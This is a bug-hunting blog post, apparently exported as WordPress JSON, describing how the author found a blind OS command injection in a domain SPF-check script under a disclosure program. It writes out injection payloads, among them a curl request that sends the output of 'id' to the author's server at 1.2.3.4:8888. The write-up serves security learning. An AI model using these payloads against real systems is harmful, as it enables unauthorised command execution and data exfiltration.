{"id":181,"date":"2022-08-21T23:47:52","date_gmt":"2022-08-21T21:47:52","guid":{"rendered":"https:\/\/bergee.it\/blog\/?p=181"},"modified":"2022-09-07T09:08:33","modified_gmt":"2022-09-07T07:08:33","slug":"blind-command-injection","status":"publish","type":"post","link":"https:\/\/bergee.it\/blog\/blind-command-injection\/","title":{"rendered":"Blind os command injection"},"content":{"rendered":"

Hi dear readers. This story is about how to find command injection, which leads to RCE getting “Thank you” in return :).<\/p>\n

I was hunting on one target I found via google dork. There was a functionality that was checking SPF records of the given domain. To clarify, a sender policy framework (SPF) record is a type of DNS TXT record that lists all the servers authorized to send emails from a particular domain. You can read more about it here<\/a>. So I started Burp and examined the request responsible for checking the domain.\u00a0 This was the request :<\/p>\n

GET \/script.php?domain=mydomain.com<\/p><\/blockquote>\n

Simple as that. I thought what if the script runs external shell command such as host<\/em> or dig <\/em>with the given domain as the parameter. I tried some command injections payloads such as:<\/p>\n

GET \/script.php?domain=mydomain.com;id<\/p><\/blockquote>\n

GET \/script.php?domain=mydomain.com id<\/p><\/blockquote>\n

But haven’t got the command output in the response just the PHP errors. After some more trials and errors, I decided to go for blind command injection. What if the command is actually executed in the backend, but no output is printed out. I checked that with curl command which connected with my own server. I added “a” parameter with $(id) value to the GET request. This way the output of the id command was sent with curl command as the value of parameter “a” to my server running at 1.2.3.4 on port 8888\u00a0 So the final request was:<\/p>\n

GET \/script.php?domain=mydomain.com;curl%201.2.3.4:8888?a=$(id)<\/p><\/blockquote>\n

Yep, I used also google.com domain for testing as google is good for everything \ud83d\ude42<\/p>\n


\n\"\"
\n<\/a><\/p>\n

Bingo! This is what I saw in the response:<\/p>\n

\"\"<\/p>\n

This was blind command injection as the command output was not seen in the response. Lesson learned – even if the script returns errors and there is no command output in response it does not mean it is not being executed. So this bug leads us to RCE (remote command execution), so this is game over :). As this was VDP program that promised some token of appreciation for serious bugs (I think RCE is serious enough), all I got in return was a “Thank you” e-mail. However, knowledge is always priceless.<\/p>\n

See you next bug \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"

Hi dear readers. This story is about how to find command injection, which leads to RCE getting “Thank you” in return :). I was hunting on one target I found via google dork. There was a functionality that was checking SPF records of the given domain. To clarify, a sender policy framework (SPF) record is…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1,33,29],"tags":[],"class_list":["post-181","post","type-post","status-publish","format-standard","hentry","category-bez-kategorii","category-vdp","category-write-up"],"yoast_head":"\nBlind os command injection - Bergee's Stories on Bug Hunting<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/bergee.it\/blog\/blind-command-injection\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Blind os command injection - Bergee's Stories on Bug Hunting\" \/>\n<meta property=\"og:description\" content=\"Hi dear readers. This story is about how to find command injection, which leads to RCE getting “Thank you” in return :). I was hunting on one target I found via google dork. There was a functionality that was checking SPF records of the given domain. To clarify, a sender policy framework (SPF) record is...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/bergee.it\/blog\/blind-command-injection\/\" \/>\n<meta property=\"og:site_name\" content=\"Bergee's Stories on Bug Hunting\" \/>\n<meta property=\"article:published_time\" content=\"2022-08-21T21:47:52+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-09-07T07:08:33+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/burp_request_redacted-1-1024x559.png\" \/>\n<meta name=\"author\" content=\"bergee\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@https:\/\/twitter.com\/bergee\" \/>\n<meta name=\"twitter:site\" content=\"@bergee\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"bergee\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/bergee.it\/blog\/blind-command-injection\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/bergee.it\/blog\/blind-command-injection\/\"},\"author\":{\"name\":\"bergee\",\"@id\":\"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73\"},\"headline\":\"Blind os command injection\",\"datePublished\":\"2022-08-21T21:47:52+00:00\",\"dateModified\":\"2022-09-07T07:08:33+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/bergee.it\/blog\/blind-command-injection\/\"},\"wordCount\":380,\"publisher\":{\"@id\":\"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73\"},\"image\":{\"@id\":\"https:\/\/bergee.it\/blog\/blind-command-injection\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/burp_request_redacted-1-1024x559.png\",\"articleSection\":[\"Bez kategorii\",\"vdp\",\"write-up\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/bergee.it\/blog\/blind-command-injection\/\",\"url\":\"https:\/\/bergee.it\/blog\/blind-command-injection\/\",\"name\":\"Blind os command injection - Bergee's Stories on Bug Hunting\",\"isPartOf\":{\"@id\":\"https:\/\/bergee.it\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/bergee.it\/blog\/blind-command-injection\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/bergee.it\/blog\/blind-command-injection\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/burp_request_redacted-1-1024x559.png\",\"datePublished\":\"2022-08-21T21:47:52+00:00\",\"dateModified\":\"2022-09-07T07:08:33+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/bergee.it\/blog\/blind-command-injection\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/bergee.it\/blog\/blind-command-injection\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/bergee.it\/blog\/blind-command-injection\/#primaryimage\",\"url\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/burp_request_redacted-1.png\",\"contentUrl\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/burp_request_redacted-1.png\",\"width\":2189,\"height\":1194},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/bergee.it\/blog\/blind-command-injection\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/bergee.it\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Blind os command injection\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/bergee.it\/blog\/#website\",\"url\":\"https:\/\/bergee.it\/blog\/\",\"name\":\"Bergee's Stories on Bug Hunting\",\"description\":\"hacking, cyber security and programming\",\"publisher\":{\"@id\":\"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/bergee.it\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73\",\"name\":\"bergee\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png\",\"url\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png\",\"contentUrl\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png\",\"width\":129,\"height\":150,\"caption\":\"bergee\"},\"logo\":{\"@id\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png\"},\"sameAs\":[\"http:\/\/localhost\/wordpress\",\"https:\/\/www.linkedin.com\/in\/bartlomiej-bergier\",\"https:\/\/x.com\/https:\/\/twitter.com\/bergee\"],\"url\":\"https:\/\/bergee.it\/blog\/author\/bergee\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Blind os command injection - Bergee's Stories on Bug Hunting","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/bergee.it\/blog\/blind-command-injection\/","og_locale":"en_US","og_type":"article","og_title":"Blind os command injection - Bergee's Stories on Bug Hunting","og_description":"Hi dear readers. This story is about how to find command injection, which leads to RCE getting “Thank you” in return :). I was hunting on one target I found via google dork. There was a functionality that was checking SPF records of the given domain. To clarify, a sender policy framework (SPF) record is...","og_url":"https:\/\/bergee.it\/blog\/blind-command-injection\/","og_site_name":"Bergee's Stories on Bug Hunting","article_published_time":"2022-08-21T21:47:52+00:00","article_modified_time":"2022-09-07T07:08:33+00:00","og_image":[{"url":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/burp_request_redacted-1-1024x559.png","type":"","width":"","height":""}],"author":"bergee","twitter_card":"summary_large_image","twitter_creator":"@https:\/\/twitter.com\/bergee","twitter_site":"@bergee","twitter_misc":{"Written by":"bergee","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/bergee.it\/blog\/blind-command-injection\/#article","isPartOf":{"@id":"https:\/\/bergee.it\/blog\/blind-command-injection\/"},"author":{"name":"bergee","@id":"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73"},"headline":"Blind os command injection","datePublished":"2022-08-21T21:47:52+00:00","dateModified":"2022-09-07T07:08:33+00:00","mainEntityOfPage":{"@id":"https:\/\/bergee.it\/blog\/blind-command-injection\/"},"wordCount":380,"publisher":{"@id":"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73"},"image":{"@id":"https:\/\/bergee.it\/blog\/blind-command-injection\/#primaryimage"},"thumbnailUrl":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/burp_request_redacted-1-1024x559.png","articleSection":["Bez kategorii","vdp","write-up"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/bergee.it\/blog\/blind-command-injection\/","url":"https:\/\/bergee.it\/blog\/blind-command-injection\/","name":"Blind os command injection - Bergee's Stories on Bug Hunting","isPartOf":{"@id":"https:\/\/bergee.it\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/bergee.it\/blog\/blind-command-injection\/#primaryimage"},"image":{"@id":"https:\/\/bergee.it\/blog\/blind-command-injection\/#primaryimage"},"thumbnailUrl":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/burp_request_redacted-1-1024x559.png","datePublished":"2022-08-21T21:47:52+00:00","dateModified":"2022-09-07T07:08:33+00:00","breadcrumb":{"@id":"https:\/\/bergee.it\/blog\/blind-command-injection\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/bergee.it\/blog\/blind-command-injection\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/bergee.it\/blog\/blind-command-injection\/#primaryimage","url":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/burp_request_redacted-1.png","contentUrl":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/burp_request_redacted-1.png","width":2189,"height":1194},{"@type":"BreadcrumbList","@id":"https:\/\/bergee.it\/blog\/blind-command-injection\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/bergee.it\/blog\/"},{"@type":"ListItem","position":2,"name":"Blind os command injection"}]},{"@type":"WebSite","@id":"https:\/\/bergee.it\/blog\/#website","url":"https:\/\/bergee.it\/blog\/","name":"Bergee's Stories on Bug Hunting","description":"hacking, cyber security and programming","publisher":{"@id":"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/bergee.it\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":["Person","Organization"],"@id":"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73","name":"bergee","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png","url":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png","contentUrl":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png","width":129,"height":150,"caption":"bergee"},"logo":{"@id":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png"},"sameAs":["http:\/\/localhost\/wordpress","https:\/\/www.linkedin.com\/in\/bartlomiej-bergier","https:\/\/x.com\/https:\/\/twitter.com\/bergee"],"url":"https:\/\/bergee.it\/blog\/author\/bergee\/"}]}},"_links":{"self":[{"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/posts\/181","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/comments?post=181"}],"version-history":[{"count":9,"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/posts\/181\/revisions"}],"predecessor-version":[{"id":193,"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/posts\/181\/revisions\/193"}],"wp:attachment":[{"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/media?parent=181"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/categories?post=181"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/tags?post=181"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}